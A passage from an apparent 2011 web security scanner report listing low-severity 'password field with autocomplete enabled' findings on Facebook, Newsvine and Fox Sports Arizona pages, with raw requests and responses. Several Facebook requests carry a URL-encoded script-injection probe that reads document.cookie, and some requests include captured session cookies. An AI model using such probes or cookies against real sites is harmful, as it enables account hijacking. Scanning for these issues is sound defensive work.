HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:22:21 GMT
Content-Length: 11156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

18.25. http://www.facebook.com/sharer.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL:
  https://login.facebook.com/login.php?login_attempt=1&display=popup
The form contains the following password field with autocomplete enabled:
  pass

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DtsRk; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:50 GMT
Content-Length: 10625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

18.26. http://www.facebook.com/todd.kenreck

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /todd.kenreck

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /todd.kenreck HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=VUacU; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:49 GMT
Content-Length: 14802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

18.27. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:53:34 GMT
Date: Sat, 29 Jan 2011 23:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

18.28. http://www.newsvine.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:13:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.29. http://www.newsvine.com/_tools/user/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/user/login

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 17589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
</h3><form method="post" action="https://www.newsvine.com/_tools/user/login"><input type="hidden" name="m" value="login" />
...[SNIP]...
<div style="margin-bottom: 9px">Password: <input type="password" name="pass" /></div>
...[SNIP]...

18.30. https://www.newsvine.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:02:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.31. https://www.newsvine.com/_nv/accounts/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/login

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:45 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3><form method="post" action="https://www.newsvine.com/_nv/api/accounts/login"><input type="hidden" name="responseType" value="redirect" />
...[SNIP]...
<div style="margin-bottom: 9px">Password: <input type="password" name="password" /></div>
...[SNIP]...

18.32. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/newsletters

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...
<div><form id="registeredUser" class="formFields" action="/_nv/api/accounts/Login" method="post" enctype="" name="regUserForm" style="display:none"><input type="hidden" name="responseType" value="redirect" />
...[SNIP]...
</label> <input name="password" id="registeredPassword" type="password" class="loginPwd"/> </div>
...[SNIP]...

18.33. https://www.newsvine.com/_nv/accounts/register

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/register

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</div><form method="post" action="/_nv/api/accounts/fullRegister"><input type="hidden" name="redirect" value="/_nv/accounts/register?affiliate=newsvine.com" />
...[SNIP]...
<td><input type="password" id="editProfilePass" name="pass" class="half flat" value="" /></td>
...[SNIP]...
<td><input type="password" id="editProfileConfirm" name="confirm" class="half flat" value="" /></td>
...[SNIP]...

18.34. http://www.polls.newsvine.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.35. http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/backyard/greenhouse

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/backyard/greenhouse HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.36. http://www.polls.newsvine.com/_nv/cms/backyard/tools

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/backyard/tools

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/backyard/tools HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:58 GMT
Content-Length: 20666
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.37. http://www.polls.newsvine.com/_nv/cms/help/faq

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/help/faq

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/help/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:41 GMT
Content-Length: 19412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.38. http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/codeOfHonor

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/info/codeOfHonor HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:48 GMT
Content-Length: 22633
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.39. http://www.polls.newsvine.com/_nv/cms/info/companyInfo

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/companyInfo

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/info/companyInfo HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 19220
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.40. http://www.polls.newsvine.com/_nv/cms/info/contact

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/contact

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/info/contact HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:43 GMT
Content-Length: 20175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.41. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/copyrightPolicy

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/info/copyrightPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:55 GMT
Content-Length: 21217
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
